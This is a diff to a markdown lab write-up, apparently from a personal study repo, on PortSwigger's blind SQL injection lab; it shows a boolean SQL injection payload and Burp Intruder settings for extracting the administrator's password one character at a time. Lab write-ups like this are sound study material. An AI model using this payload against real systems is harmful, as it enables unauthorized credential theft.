ArchCipher/CyberSecurity/PortSwigger-web-security-academy/SQL-injection/09-blind-sqli-conditional-responses.md

 ```sql
 ' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§`
 ```

 `§a§` is replaced with each character from the payload list.

 Payload tab configuration:
 Payload type: simple list
 Payload set: a-z and 0-9 (assuming no uppercase letters)

-In the Grep-Match tab (from Settings), search for the value `Welcome back`.

-Start the Sniper attack.
+In the Grep-Match tab (from Settings), search for the value `Welcome back`, and start the Sniper attack.

 This returned a "Welcome back" message only for character `m`, indicating that `m` is the first character of the password.